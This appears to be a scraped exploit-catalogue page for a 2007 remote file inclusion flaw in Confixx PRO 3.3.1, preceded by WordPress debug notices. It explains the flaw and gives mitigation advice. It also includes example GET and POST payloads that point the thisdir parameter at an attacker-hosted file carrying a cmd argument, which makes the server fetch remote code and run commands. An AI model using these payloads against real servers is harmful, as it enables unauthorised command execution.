Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
Confixx - exploit.company
header-logo
Suggest Exploit
vendor:
Confixx
by:
H4 / XPK
N/A
CVSS
N/A
Remote File Inclusion
CWE
Product Name: Confixx
Affected Version From:
Affected Version To: Confixx PRO 3.3.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability

The Confixx PRO version 3.3.1 is vulnerable to remote file inclusion. An attacker can access the file saveserver.php without authentication. The vulnerability exists due to the variable $thisdir not being defined in the code. By exploiting this vulnerability, an attacker can execute arbitrary commands on the target system. The conditions for exploitation are that the open_basedir restriction is turned off and allow_url_fopen is set to on. The attacker can send a POST request or a GET request to the saveserver.php file with the parameter thisdir set to a malicious URL that includes the command to be executed. For example, the attacker can send a POST request with thisdir set to http://[yoursite]/images/1.jpg?&cmd=ls -la or a GET request with saveserver.php?thisdir=http://[yoursite]/images/1.jpg?&cmd=ls -la.

Mitigation:

To mitigate this vulnerability, the open_basedir restriction should be enabled and allow_url_fopen should be set to off in the PHP configuration. Additionally, input validation should be implemented to ensure that the $thisdir variable is properly defined and does not allow remote file inclusion.
Source

Exploit-DB raw data:

Navigation

Suggest Exploit

Services By CQR

cqrsecured